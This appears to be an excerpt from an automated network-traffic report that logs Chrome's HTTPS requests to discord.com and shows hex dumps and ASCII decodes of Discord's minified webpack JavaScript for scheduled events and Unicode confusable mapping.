                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 37 66 65 36 66 63 37 32 35 64 63 2e 70 6e 67 22 7d 2c 35 35 32 39 39 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 66 34 37 34 38 35 36 30 32 33 36 35 63 39 34 36 66 61 35 32 2e 73 76 67 22 7d 2c 34 38 33 38 31 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 66 38 64 33 31 31 37 31 32 34 36 64 66 61 66 39 30 62 31 32 2e 70 6e 67 22 7d 2c 39 35 35 33 30 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 63 63 35 32 39 38 38 38 34 39 66 38 36 65 31 63 38 35 66 35 2e 73 76 67 22 7d 2c 31 39 32
                                                                          Data Ascii: 7fe6fc725dc.png"},552995:function(e,t,n){"use strict";e.exports=n.p+"f47485602365c946fa52.svg"},483819:function(e,t,n){"use strict";e.exports=n.p+"f8d31171246dfaf90b12.png"},955307:function(e,t,n){"use strict";e.exports=n.p+"cc52988849f86e1c85f5.svg"},192
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 30 63 62 66 65 65 32 30 61 33 66 32 63 64 30 64 64 33 31 33 2e 73 76 67 22 7d 2c 38 39 39 36 37 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 77 6f 72 6b 6c 65 74 2e 38 34 66 63 35 34 36 61 31 63 38 39 30 36 61 61 30 38 61 65 2e 6a 73 22 7d 2c 31 35 37 35 35 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 66 65 74 63 68 42 72 61 6e 63 68 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 2c 66 65 74 63 68 42 72 61 6e 63 68 65 73 46 6f 72 41 70 70 6c 69 63 61 74 69 6f 6e 3a 66 75 6e 63
                                                                          Data Ascii: se strict";e.exports=n.p+"0cbfee20a3f2cd0dd313.svg"},899676:function(e,t,n){"use strict";e.exports=n.p+"worklet.84fc546a1c8906aa08ae.js"},157552:function(e,t,n){"use strict";n.r(t),n.d(t,{fetchBranches:function(){return c},fetchBranchesForApplication:func


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          304192.168.2.550040162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:17 UTC866OUTGET /assets/81161.abe9578e4d66ca1934cd.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=UAbhRsmaZWARet7AlYcqNYX1MndAdyXs_47d49tl628-1702226716836-0-604800000
                                                                          2023-12-10 16:45:17 UTC973INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 35 34 35 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 31 37 62 62 63 30 36 64 64 61 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:17 GMTContent-Type: application/javascriptContent-Length: 15452Connection: closeCF-Ray: 8336f517bbc06dda-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:17 UTC396INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 38 31 31 36 31 22 5d 2c 7b 37 35 37 37 36 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 75 2c 6c 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 52 65 63 75 72 72 65 6e 63 65 4f 70 74 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 7d 29 2c 28 6c 3d 75 7c 7c 28 75 3d 7b 7d 29 29 5b 6c 2e 4e 4f 4e 45 3d 30 5d 3d 22 4e 4f 4e 45 22 2c 6c 5b 6c 2e 57 45 45 4b 4c 59 3d 31 5d 3d 22 57 45 45 4b 4c 59 22 2c 6c 5b 6c 2e 4d 4f 4e 54 48 4c 59 3d 32 5d 3d 22 4d 4f 4e 54 48
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["81161"],{757767:function(e,t,n){"use strict";var u,l;n.r(t),n.d(t,{RecurrenceOptions:function(){return u}}),(l=u||(u={}))[l.NONE=0]="NONE",l[l.WEEKLY=1]="WEEKLY",l[l.MONTHLY=2]="MONTH
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 7d 29 3b 76 61 72 20 75 3d 6e 28 22 38 36 32 32 30 35 22 29 3b 6c 65 74 20 6c 3d 28 30 2c 75 2e 63 72 65 61 74 65 45 78 70 65 72 69 6d 65 6e 74 29 28 7b 6b 69 6e 64 3a 22 67 75 69 6c 64 22 2c 69 64 3a 22 32 30 32 33 2d 30 39 5f 67 75 69 6c 64 5f 65 76 65 6e 74 73 5f 61 75 74 6f 5f 73 74 61 72 74 22 2c 6c 61 62 65 6c 3a 22 41 6c 6c 6f 77 20 75 73 65 72 73 20 74 6f 20 74 6f 67 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 73 74 61 72 74 20 65 76 65 6e 74 73 22 2c 64 65 66 61 75 6c 74 43 6f 6e 66 69 67 3a 7b 63 61 6e 55 73 65 45 76 65 6e 74 73 41 75 74 6f 53 74 61 72 74 54 6f 67 67 6c 65 3a 21 31 7d 2c 74 72 65 61 74 6d 65 6e 74 73 3a 5b 7b 69 64 3a 31 2c 6c 61 62 65 6c 3a 22 55 73 65 72 20 63 61 6e 20 73 65 65 20 61 75 74 6f 73 74 61 72 74 20 74 6f
                                                                          Data Ascii: });var u=n("862205");let l=(0,u.createExperiment)({kind:"guild",id:"2023-09_guild_events_auto_start",label:"Allow users to toggle automatically start events",defaultConfig:{canUseEventsAutoStartToggle:!1},treatments:[{id:1,label:"User can see autostart to
                                                                          2023-12-10 16:45:17 UTC1245INData Raw: 65 2c 73 63 68 65 64 75 6c 65 64 5f 65 6e 64 5f 74 69 6d 65 3a 74 2e 73 63 68 65 64 75 6c 65 64 45 6e 64 54 69 6d 65 2c 65 6e 74 69 74 79 5f 74 79 70 65 3a 74 2e 65 6e 74 69 74 79 54 79 70 65 2c 63 68 61 6e 6e 65 6c 5f 69 64 3a 72 2c 65 6e 74 69 74 79 5f 6d 65 74 61 64 61 74 61 3a 64 2c 62 72 6f 61 64 63 61 73 74 5f 74 6f 5f 64 69 72 65 63 74 6f 72 79 5f 63 68 61 6e 6e 65 6c 73 3a 6c 2e 62 72 6f 61 64 63 61 73 74 54 6f 44 69 72 65 63 74 6f 72 79 43 68 61 6e 6e 65 6c 73 2c 72 65 63 75 72 72 65 6e 63 65 5f 72 75 6c 65 3a 28 30 2c 73 2e 72 65 63 75 72 72 65 6e 63 65 52 75 6c 65 54 6f 53 65 72 76 65 72 29 28 74 2e 72 65 63 75 72 72 65 6e 63 65 52 75 6c 65 29 7d 3b 72 65 74 75 72 6e 20 61 26 26 28 6f 2e 61 75 74 6f 5f 73 74 61 72 74 3d 74 2e 61 75 74 6f 53 74
                                                                          Data Ascii: e,scheduled_end_time:t.scheduledEndTime,entity_type:t.entityType,channel_id:r,entity_metadata:d,broadcast_to_directory_channels:l.broadcastToDirectoryChannels,recurrence_rule:(0,s.recurrenceRuleToServer)(t.recurrenceRule)};return a&&(o.auto_start=t.autoSt
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 47 65 74 57 69 74 68 43 6f 75 6e 74 72 79 43 6f 64 65 51 75 65 72 79 29 28 74 29 3b 72 65 74 75 72 6e 20 6c 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 46 45 54 43 48 5f 47 55 49 4c 44 5f 45 56 45 4e 54 53 5f 46 4f 52 5f 47 55 49 4c 44 22 2c 67 75 69 6c 64 49 64 3a 65 2c 67 75 69 6c 64 53 63 68 65 64 75 6c 65 64 45 76 65 6e 74 73 3a 6e 7d 29 2c 6e 7d 2c 61 73 79 6e 63 20 66 65 74 63 68 47 75 69 6c 64 45 76 65 6e 74 55 73 65 72 43 6f 75 6e 74 73 28 65 2c 74 2c 6e 29 7b 6c 65 74 20 72 3d 7b 75 72 6c 3a 5f 2e 45 6e 64 70 6f 69 6e 74 73 2e 47 55 49 4c 44 5f 45 56 45 4e 54 5f 55 53 45 52 5f 43 4f 55 4e 54 53 28 65 2c 74 29 2c 71 75 65 72 79 3a 7b 67 75 69 6c 64 5f 73 63 68 65 64 75 6c 65 64 5f 65 76 65 6e 74 5f 65 78 63 65 70 74
                                                                          Data Ascii: GetWithCountryCodeQuery)(t);return l.default.dispatch({type:"FETCH_GUILD_EVENTS_FOR_GUILD",guildId:e,guildScheduledEvents:n}),n},async fetchGuildEventUserCounts(e,t,n){let r={url:_.Endpoints.GUILD_EVENT_USER_COUNTS(e,t),query:{guild_scheduled_event_except
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 63 65 70 74 69 6f 6e 49 64 3a 74 2c 72 65 73 70 6f 6e 73 65 3a 72 7d 29 2c 75 7d 7d 2c 61 73 79 6e 63 20 64 65 6c 65 74 65 52 73 76 70 46 6f 72 47 75 69 6c 64 45 76 65 6e 74 28 65 2c 74 2c 6e 29 7b 6c 65 74 20 72 3d 69 2e 64 65 66 61 75 6c 74 2e 67 65 74 49 64 28 29 2c 64 3d 6f 2e 64 65 66 61 75 6c 74 2e 67 65 74 52 73 76 70 28 65 2c 74 2c 72 29 3b 69 66 28 6e 75 6c 6c 21 3d 64 29 74 72 79 7b 72 65 74 75 72 6e 20 6c 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 47 55 49 4c 44 5f 53 43 48 45 44 55 4c 45 44 5f 45 56 45 4e 54 5f 55 53 45 52 5f 52 45 4d 4f 56 45 22 2c 75 73 65 72 49 64 3a 72 2c 67 75 69 6c 64 49 64 3a 6e 2c 67 75 69 6c 64 45 76 65 6e 74 49 64 3a 65 2c 67 75 69 6c 64 45 76 65 6e 74 45 78 63 65 70 74 69 6f 6e 49 64
                                                                          Data Ascii: ceptionId:t,response:r}),u}},async deleteRsvpForGuildEvent(e,t,n){let r=i.default.getId(),d=o.default.getRsvp(e,t,r);if(null!=d)try{return l.default.dispatch({type:"GUILD_SCHEDULED_EVENT_USER_REMOVE",userId:r,guildId:n,guildEventId:e,guildEventExceptionId
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 75 6c 74 2e 70 61 74 63 68 28 7b 75 72 6c 3a 5f 2e 45 6e 64 70 6f 69 6e 74 73 2e 47 55 49 4c 44 5f 45 56 45 4e 54 5f 45 58 43 45 50 54 49 4f 4e 28 74 2c 6e 2c 6c 29 2c 62 6f 64 79 3a 7b 73 63 68 65 64 75 6c 65 64 5f 73 74 61 72 74 5f 74 69 6d 65 3a 72 2c 73 63 68 65 64 75 6c 65 64 5f 65 6e 64 5f 74 69 6d 65 3a 64 2c 69 73 5f 63 61 6e 63 65 6c 65 64 3a 69 7d 7d 29 7d 2c 64 65 6c 65 74 65 47 75 69 6c 64 45 76 65 6e 74 45 78 63 65 70 74 69 6f 6e 3a 28 65 2c 74 2c 6e 29 3d 3e 75 2e 64 65 66 61 75 6c 74 2e 64 65 6c 65 74 65 28 7b 75 72 6c 3a 5f 2e 45 6e 64 70 6f 69 6e 74 73 2e 47 55 49 4c 44 5f 45 56 45 4e 54 5f 45 58 43 45 50 54 49 4f 4e 28 65 2c 74 2c 6e 29 7d 29 7d 7d 2c 31 38 39 34 34 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73
                                                                          Data Ascii: ult.patch({url:_.Endpoints.GUILD_EVENT_EXCEPTION(t,n,l),body:{scheduled_start_time:r,scheduled_end_time:d,is_canceled:i}})},deleteGuildEventException:(e,t,n)=>u.default.delete({url:_.Endpoints.GUILD_EVENT_EXCEPTION(e,t,n)})}},189443:function(e,t,n){"use s
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 65 3a 63 2c 73 63 68 65 64 75 6c 65 64 45 6e 64 54 69 6d 65 3a 6f 2c 65 6e 74 69 74 79 54 79 70 65 3a 45 2c 65 6e 74 69 74 79 4d 65 74 61 64 61 74 61 3a 5f 2c 69 6d 61 67 65 3a 79 2c 72 65 63 75 72 72 65 6e 63 65 52 75 6c 65 3a 76 2c 65 76 65 6e 74 45 78 63 65 70 74 69 6f 6e 73 3a 66 7d 3d 65 3b 72 65 74 75 72 6e 7b 69 64 3a 6e 75 6c 6c 21 3d 6e 3f 6e 3a 61 2e 46 41 4b 45 5f 45 56 45 4e 54 5f 49 44 2c 6e 61 6d 65 3a 75 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 6e 75 6c 6c 21 3d 6c 3f 6c 3a 6e 75 6c 6c 2c 70 72 69 76 61 63 79 5f 6c 65 76 65 6c 3a 64 2c 73 63 68 65 64 75 6c 65 64 5f 73 74 61 72 74 5f 74 69 6d 65 3a 63 2c 73 63 68 65 64 75 6c 65 64 5f 65 6e 64 5f 74 69 6d 65 3a 6f 2c 65 6e 74 69 74 79 5f 74 79 70 65 3a 45 2c 65 6e 74 69 74 79 5f 6d 65 74 61 64
                                                                          Data Ascii: e:c,scheduledEndTime:o,entityType:E,entityMetadata:_,image:y,recurrenceRule:v,eventExceptions:f}=e;return{id:null!=n?n:a.FAKE_EVENT_ID,name:u,description:null!=l?l:null,privacy_level:d,scheduled_start_time:c,scheduled_end_time:o,entity_type:E,entity_metad
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 73 63 68 65 64 75 6c 65 64 5f 65 6e 64 5f 74 69 6d 65 2c 61 75 74 6f 53 74 61 72 74 3a 6e 75 6c 6c 21 3d 3d 28 79 3d 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 61 75 74 6f 5f 73 74 61 72 74 29 26 26 76 6f 69 64 20 30 21 3d 3d 79 3f 79 3a 21 28 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 68 61 73 46 65 61 74 75 72 65 28 63 2e 47 75 69 6c 64 46 65 61 74 75 72 65 73 2e 43 4f 4d 4d 55 4e 49 54 59 29 29 2c 72 65 63 75 72 72 65 6e 63 65 52 75 6c 65 3a 45 28 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 72 65 63 75 72 72 65 6e 63 65 5f 72 75 6c 65 29 2c 65 76 65 6e 74 45 78 63 65 70 74 69 6f 6e 73 3a 28 6e 75 6c 6c 21 3d 3d 28 76 3d 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 67 75 69 6c 64 5f 73 63
                                                                          Data Ascii: =t?void 0:t.scheduled_end_time,autoStart:null!==(y=null==t?void 0:t.auto_start)&&void 0!==y?y:!(null==e?void 0:e.hasFeature(c.GuildFeatures.COMMUNITY)),recurrenceRule:E(null==t?void 0:t.recurrence_rule),eventExceptions:(null!==(v=null==t?void 0:t.guild_sc
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 64 53 63 68 65 64 75 6c 65 64 45 76 65 6e 74 45 6e 74 69 74 79 54 79 70 65 73 2e 45 58 54 45 52 4e 41 4c 26 26 6e 75 6c 6c 21 3d 74 26 26 22 6c 6f 63 61 74 69 6f 6e 22 69 6e 20 74 26 26 28 6e 3d 74 2e 6c 6f 63 61 74 69 6f 6e 29 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 6c 65 74 7b 65 6e 74 69 74 79 5f 74 79 70 65 3a 74 2c 65 6e 74 69 74 79 5f 6d 65 74 61 64 61 74 61 3a 6e 7d 3d 65 3b 72 65 74 75 72 6e 20 64 28 74 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 6c 65 74 7b 65 6e 74 69 74 79 54 79 70 65 3a 74 2c 65 6e 74 69 74 79 4d 65 74 61 64 61 74 61 3a 6e 7d 3d 65 3b 72 65 74 75 72 6e 20 64 28 74 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 6c 2e 47 75 69 6c 64 53 63 68 65 64 75 6c 65 64 45 76 65
                                                                          Data Ascii: dScheduledEventEntityTypes.EXTERNAL&&null!=t&&"location"in t&&(n=t.location),n}function i(e){let{entity_type:t,entity_metadata:n}=e;return d(t,n)}function a(e){let{entityType:t,entityMetadata:n}=e;return d(t,n)}function c(e){return e===l.GuildScheduledEve


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          305192.168.2.550041162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:17 UTC866OUTGET /assets/27043.105ce50242094adf158e.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=UAbhRsmaZWARet7AlYcqNYX1MndAdyXs_47d49tl628-1702226716836-0-604800000
                                                                          2023-12-10 16:45:17 UTC965INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 31 32 30 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 31 38 30 66 39 64 30 33 31 34 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:17 GMTContent-Type: application/javascriptContent-Length: 91205Connection: closeCF-Ray: 8336f5180f9d0314-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 32 37 30 34 33 22 5d 2c 7b 35 32 35 32 31 37 3a 66 75 6e 63 74 69 6f 6e 28 44 2c 75 2c 45 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 44 2e 65 78 70 6f 72 74 73 3d 7b 30 3a 22 4f 22 2c 31 3a 22 6c 22 2c 22 d6 ad 22 3a 22 d6 96 22 2c 22 d6 ae 22 3a 22 d6 98 22 2c 22 d6 a8 22 3a 22 d6 99 22 2c 22 d6 a4 22 3a 22 d6 9a 22 2c 22 e1 aa b4 22 3a 22 db 9b 22 2c 22 e2 83 9b 22 3a 22 db 9b 22 2c 22 d8 99 22 3a 22 cc 93 22 2c 22 e0 a3 b3 22 3a 22 cc 93 22 2c 22 cd 83 22 3a 22 cc 93 22 2c 22 cc 95 22 3a 22 cc 93 22 2c 22 d9 8f 22 3a 22 cc 93 22 2c 22 d9
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["27043"],{525217:function(D,u,E){"use strict";D.exports={0:"O",1:"l","":"","":"","":"","":"","":"","":"","":"","":"","":"","":"","":"","
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 44 43 43 33 22 3a 22 cc a3 22 2c 22 5c 75 44 38 30 32 5c 75 44 45 33 41 22 3a 22 cc a3 22 2c 22 e0 a3 ae 22 3a 22 cc a4 22 2c 22 e1 b3 9e 22 3a 22 cc a4 22 2c 22 e0 bc b7 22 3a 22 cc a5 22 2c 22 e3 80 ad 22 3a 22 cc a5 22 2c 22 cc a7 22 3a 22 cc a6 22 2c 22 cc a1 22 3a 22 cc a6 22 2c 22 cc b9 22 3a 22 cc a6 22 2c 22 e1 b3 99 22 3a 22 cc ad 22 2c 22 e1 b3 98 22 3a 22 cc ae 22 2c 22 e0 a5 92 22 3a 22 cc b1 22 2c 22 cc a0 22 3a 22 cc b1 22 2c 22 e0 a3 b1 22 3a 22 d9 8c 22 2c 22 e0 a3 a8 22 3a 22 d9 8c 22 2c 22 e0 a3 a5 22 3a 22 d9 8c 22 2c ef b1 9e 3a 22 ef b9 b2 d9 91 22 2c 22 e0 a3 b2 22 3a 22 d9 8d 22 2c ef b1 9f 3a 22 ef b9 b4 d9 91 22 2c ef b3 b2 3a 22 ef b9 b7 d9 91 22 2c ef b1 a0 3a 22 ef b9 b6 d9 91 22 2c ef b3 b3 3a 22 ef b9 b9 d9 91 22 2c ef b1 a1
                                                                          Data Ascii: DCC3":"","\uD802\uDE3A":"","":"","":"","":"","":"","":"","":"","":"","":"","":"","":"","":"","":"","":"","":"",:"","":"",:"",:"",:"",:"",
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 44 38 30 32 5c 75 44 45 35 30 22 3a 22 2e 22 2c 22 d9 a0 22 3a 22 2e 22 2c 22 db b0 22 3a 22 2e 22 2c ea 93 b8 3a 22 2e 22 2c ea 93 bb 3a 22 2e 2c 22 2c 22 e2 80 a5 22 3a 22 2e 2e 22 2c ea 93 ba 3a 22 2e 2e 22 2c 22 e2 80 a6 22 3a 22 2e 2e 2e 22 2c 22 ea 9b b4 22 3a 22 ea 9b b3 ea 9b b3 22 2c 22 e3 83 bb 22 3a 22 5c 78 62 37 22 2c 22 ef bd a5 22 3a 22 5c 78 62 37 22 2c 22 e1 9b ab 22 3a 22 5c 78 62 37 22 2c 22 ce 87 22 3a 22 5c 78 62 37 22 2c 22 e2 b8 b1 22 3a 22 5c 78 62 37 22 2c 22 5c 75 44 38 30 30 5c 75 44 44 30 31 22 3a 22 5c 78 62 37 22 2c 22 e2 80 a2 22 3a 22 5c 78 62 37 22 2c 22 e2 80 a7 22 3a 22 5c 78 62 37 22 2c 22 e2 88 99 22 3a 22 5c 78 62 37 22 2c 22 e2 8b 85 22 3a 22 5c 78 62 37 22 2c ea 9e 8f 3a 22 5c 78 62 37 22 2c e1 90 a7 3a 22 5c 78 62
                                                                          Data Ascii: D802\uDE50":".","":".","":".",:".",:".,","":"..",:"..","":"...","":"","":"\xb7","":"\xb7","":"\xb7","":"\xb7","":"\xb7","\uD800\uDD01":"\xb7","":"\xb7","":"\xb7","":"\xb7","":"\xb7",:"\xb7",:"\xb
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 5c 78 62 37 e1 94 ad 22 2c e1 94 bb 3a 22 5c 78 62 37 e1 94 ae 22 2c e1 a3 8e 3a 22 5c 78 62 37 e1 95 83 22 2c e1 a3 8f 3a 22 5c 78 62 37 e1 95 86 22 2c e1 a3 90 3a 22 5c 78 62 37 e1 95 87 22 2c e1 a3 91 3a 22 5c 78 62 37 e1 95 88 22 2c e1 a3 92 3a 22 5c 78 62 37 e1 95 89 22 2c e1 a3 93 3a 22 5c 78 62 37 e1 95 8b 22 2c e1 95 8e 3a 22 5c 78 62 37 e1 95 8c 22 2c e1 95 9b 3a 22 5c 78 62 37 e1 95 9a 22 2c e1 95 a8 3a 22 5c 78 62 37 e1 95 a7 22 2c e1 a2 b3 3a 22 5c 78 62 37 e1 a2 b1 22 2c e1 a2 b6 3a 22 5c 78 62 37 e1 a2 b4 22 2c e1 a2 b9 3a 22 5c 78 62 37 e1 a2 b8 22 2c e1 a3 82 3a 22 5c 78 62 37 e1 a3 80 22 2c 22 ea a0 b0 22 3a 22 e0 a5 a4 22 2c 22 e0 a5 a5 22 3a 22 e0 a5 a4 e0 a5 a4 22 2c 22 e1 b0 bc 22 3a 22 e1 b0 bb e1 b0 bb 22 2c 22 e1 81 8b 22 3a 22 e1
                                                                          Data Ascii: \xb7",:"\xb7",:"\xb7",:"\xb7",:"\xb7",:"\xb7",:"\xb7",:"\xb7",:"\xb7",:"\xb7",:"\xb7",:"\xb7",:"\xb7",:"\xb7",:"\xb7","":"","":"","":"","":"
